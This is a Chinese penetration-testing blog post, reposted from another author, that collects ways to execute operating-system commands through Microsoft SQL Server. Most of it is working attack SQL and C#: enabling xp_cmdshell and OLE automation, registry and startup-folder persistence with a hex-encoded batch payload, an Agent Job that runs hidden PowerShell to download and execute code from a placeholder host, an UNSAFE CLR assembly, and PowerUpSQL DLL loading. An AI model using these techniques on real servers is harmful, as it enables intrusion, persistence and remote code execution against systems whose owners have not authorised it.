酷帥王子'blog-

Exec OS Command Via MSSQL

2022-6-15 21:42 作者:酷帥王子 | 黑盒网络渗透测试 | 标签: 转载自https://www.77169.net/html/207208.html

  • 0x00 简介
  • 0x01 常用的一些姿势
    • 1. XP_CMDSHELL
    • 2. SP_OACREATE
    • 3. 自启动
    • 4. 通过沙盒执行命令
  • 0x02 通过Agent Job执行命令
  • 0x03 SQL Server CLR
  • 0x04 PowerUpSQL
    • 1. SP_Addextendedproc
    • 2. SMB Relay Attacks
  • 0x05 小结
  • 0x06 参考

0x00 简介

渗透测试过程中,大家经常会碰到通过MSSQL来进行提权或执行系统命令之类的操作,通常我们经常会使用xp_cmdshell来进行执行系统命令,但是当xp_cmdshell不能使用的时候,我们还有什么别的方式么?本文将介绍与分享一下我自己学到的一些姿势。

 

0x01 常用的一些姿势

1. XP_CMDSHELL

这个大家都比较熟悉了,通过xp_cmdshell来执行命令,可使用以下语句来执行:

[sourcecode language="plain"]exec master..xp_cmdshell "whoami"[/sourcecode]

默认情况下xp_cmdshell 是禁止的,如下图:

这个时候,可以使用以下命令进行开启:

[sourcecode language="plain"]EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;[/sourcecode]

 

 

关闭一样,只是将上面的后面的那个"1"改成"0"就可以了。
开启以后,则可执行系统命令

如果xp_cmdshell被删除,可以尝试上传xplog70.dll进行恢复,恢复语句:

[sourcecode language="plain"]Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'[/sourcecode]

 

2. SP_OACREATE

1.   xp_cmdshell 删除以后,可以使用SP_OACreate

2.   首先要打开组件:

[sourcecode language="plain"]
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
[/sourcecode]

之后使用以下语句执行命令:

[sourcecode language="plain"]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'[/sourcecode]

这里要注意一下,此方式执行是无回显的

 

 

3. 自启动

以下方式需要电脑重启。
添加注册表:

[sourcecode language="plain"]xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','exec','REG_SZ','ipconfig'[/sourcecode]

备份添加启动项:

[sourcecode language="plain"]
alter database test set RECOVERY FULL-- (SQL设置成日志完全恢复模式)
create table cmd (a image)-- (新建立一个cmd)
backup database test to disk = 'D:\\temp\\cmd' WITH init --
backup log test to disk = 'D:\\temp\\cmd1' WITH init -- (减少备分数据的大小)
insert into cmd (a) values (0x0a406563686f206f66660d0a406563686f206f66660d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a400d0a40)
-- (插入cmd命令)
backup log test to disk = 'C:\\Documents and Settings\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat'-- (备分日志到启动路径)
drop table cmd --(删除新建的cmd表)
alter database test set RECOVERY SIMPLE--(SQL设置成日志简单恢复模式)
[/sourcecode]

测试发现,Win10+MSSQL 2012导出的批处理并不能顺利执行,可能与系统及数据库版本有一定关系,成功率并不怎么高。

4. 通过沙盒执行命令

开启沙盒:

[sourcecode language="plain"]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1[/sourcecode]

然后利用jet.oledb执行命令:

[sourcecode language="plain"]select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')[/sourcecode]

 

0x02 通过Agent Job执行命令

此种方式适用于服务器开启了MSSQL Agent Job服务,并且服务器中当前运行的用户账号拥有足够的权限去创建并执行代理作业的情况。
利用代码如下:

[sourcecode language="plain"]USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''<a href="http://ip_or_hostname/file">http://IP_OR_HOSTNAME/file</a>''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';[/sourcecode]

 

关于此种方式已经有文章进行介绍,有兴趣可以阅读一下。戳我

0x03 SQL Server CLR

这种方式是最近才学到的,也是本文重点介绍的一种姿势。
Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。对于 SQL Server 用户和应用程序开发人员来说,CLR 集成意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET Microsoft Visual C#)编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。
要通过此种方式来执行命令,也有几个前提:
1SQL Server上能启用CLR并可以创建自定义存储过程
2SQL Server当前账号具有执行命令/代码所需要的权限

创建CLR有两种方式:
方式一:使用DLL文件进行创建

[sourcecode language="plain"]CREATE ASSEMBLY AssemblyName from DLLPath[/sourcecode]

方式二:使用文件16进制流进行创建

[sourcecode language="plain"]CREATE ASSEMBLY AssemblyName from 文件十六进制流[/sourcecode]

对于做渗透的我们,当然是没有文件是最好的方式了,因此,本文主要介绍方式二。以下为详细测试步骤:
1、安装Visual StudioSQL Server数据库,此次测试使用了VS2015SQL2012
2、创建一个新的SQL Server数据库项目

3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012; SQLCLR权限级别修改为UNSAFE;修改.Net 框架版本为自己需要的版本;语言选择C#

4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程

5、填入以下测试代码:

[sourcecode language="plain"]
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;

public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void SqlStoredProcedure1 ()
{
// 在此处放置代码
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/C whoami > d:\\temp\\1.txt";
process.Start();
}
}
[/sourcecode]

6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件。

7、双击此文件进行解压,将解压出一个名为mode.sql的文件。
8、执行SQL文件中的以下语句

[sourcecode language="plain"]
CREATE ASSEMBLY [ExecCode]
AUTHORIZATION [dbo]
FROM 0x4D5A[...snip...]
WITH PERMISSION_SET = UNSAFE;
[/sourcecode]

之后执行:

[sourcecode language="plain"]
CREATE PROCEDURE [dbo].[SqlStoredProcedure1]
AS EXTERNAL NAME [ExecCode].[StoredProcedures].[SqlStoredProcedure1]
[/sourcecode]

9、开启数据库服务器配置选项clr enabled

[sourcecode language="plain"]
EXEC sp_configure N'show advanced options', N'1'
RECONFIGURE WITH OVERRIDE
--开启clr enabled 选项
EXEC sp_configure N'clr enabled', N'1'
RECONFIGURE WITH OVERRIDE
--关闭所有服务器配置选项
EXEC sp_configure N'show advanced options', N'0'
RECONFIGURE WITH OVERRIDE
--如果存在权限问题,执行下面一段脚本
alter database [master] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'
[/sourcecode]

10、执行命令:

[sourcecode language="plain"]EXEC [dbo].[SqlStoredProcedure1]; [/sourcecode]

如果没成功,可以换个数据库试试看。

11、删除存储过程

[sourcecode language="plain"]
DROP PROCEDURE [dbo].[SqlStoredProcedure1];
DROP ASSEMBLY ExecCode;
[/sourcecode]

0x04 PowerUpSQL

当然针对SQL Server攻击,有一个强大的工具PowerUpSQL,里面也有很多针对MSSQL攻击方式。下面介绍两种比较实用的方式。

1. SP_Addextendedproc

套件中的Create-SQLFileXpDll方法,在这里对其使用方式简单的进行一下介绍。
创建DLL

[sourcecode language="plain"]
PS C:\Users\Evi1cg\Desktop\PowerUpSQL> . .\PowerUpSQL.ps1
PS C:\Users\Evi1cg\Desktop\PowerUpSQL> Create-SQLFileXpDll -OutFile D:\temp\exec.dll -Command "echo Exec test > D:\temp\
test.txt" -ExportName xp_test
[/sourcecode]


SQL Server 通过 sp_addextendedproc 调用DLL从而达到命令执行的效果。这里有两种方式导入:

[sourcecode language="plain"]
//via local disk
sp_addextendedproc 'xp_test', 'D:\temp\exec.dll'
//via UNC path:
sp_addextendedproc 'xp_test', '\\servername\pathtofile\exec.dll'
[/sourcecode]

1.  

2.   导入之后的可调用xp_test来执行命令:

[sourcecode language="plain"]exec master..xp_test;[/sourcecode]

1.   通过以下命令可以卸载:

[sourcecode language="plain"]sp_dropextendedproc 'xp_test'[/sourcecode]

 

2. SMB Relay Attacks

针对这种方式,已经有文章总结了,这里就不多做介绍了,详细请看这里

 

0x05 小结

本文就通过SQL Server 执行系统命令进行了一下小结,当然方式可能不全,仅仅是自己知道的一些方法,还希望大牛别喷,如果您有什么更加新颖的方法,欢迎补充,希望本文对你有所帮助。

 

0x06 参考

1.http://bobao.360.cn/learning/detail/3070.html
2.https://www.mssqltips.com/sqlservertip/2087/how-to-execute-a-dos-command-when-xpcmdshell-is-disabled-in-sql-server/
3.http://blog.csdn.net/tjvictor/article/details/4726933
4.https://www.mssqltips.com/sqlservertip/1662/writing-to-an-operating-system-file-using-the-sql-server-sqlclr/
5.https://www.t00ls.net/viewthread.php?tid=23198&extra=page%3D1%26amp%3Bfilter%3Dtype%26amp%3Btypeid%3D39

文章出处:Evi1cg's blog   

 

文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-369.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.